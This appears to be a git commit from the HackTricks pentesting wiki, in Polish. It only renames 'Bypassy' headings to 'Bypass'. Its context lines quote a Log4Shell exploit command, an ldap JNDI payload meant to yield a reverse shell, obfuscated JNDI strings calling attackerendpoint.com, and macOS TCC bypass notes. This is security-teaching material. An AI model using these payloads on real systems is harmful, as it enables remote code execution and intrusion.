This commit is contained in:
Carlos Polop 2025-04-15 00:04:30 +02:00
parent 930796caeb
commit f4e5fa4061
4 changed files with 6 additions and 6 deletions

View File

@ -256,7 +256,7 @@ uuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3
Rozszerzony atrybut `com.apple.macl` **nie może być usunięty** jak inne rozszerzone atrybuty, ponieważ jest **chroniony przez SIP**. Jednak, jak [**wyjaśniono w tym poście**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/), możliwe jest jego wyłączenie **zipując** plik, **usuwając** go i **rozpakowując** go.
## TCC Privesc & Bypassy
## TCC Privesc & Bypass
### Wstaw do TCC
@ -554,10 +554,10 @@ AllowApplicationsList.plist:
</dict>
</plist>
```
### TCC Bypassy
### TCC Bypass
{{#ref}}
macos-tcc-bypassy/
macos-tcc-bypasses/
{{#endref}}
## Odniesienia

View File

@ -1,4 +1,4 @@
# macOS TCC Bypassy
# macOS TCC Bypass
{{#include ../../../../../banners/hacktricks-training.md}}

View File

@ -1,4 +1,4 @@
# 403 & 401 Bypassy
# 403 & 401 Bypass
{{#include ../../banners/hacktricks-training.md}}

View File

@ -311,7 +311,7 @@ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tm
Teraz możesz łatwo użyć wygenerowanego linku JNDI, aby wykorzystać lukę i uzyskać **reverse shell**, wysyłając do podatnej wersji log4j: **`${ldap://10.10.14.10:1389/generated}`**
### Bypassy
### Bypass
```java
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}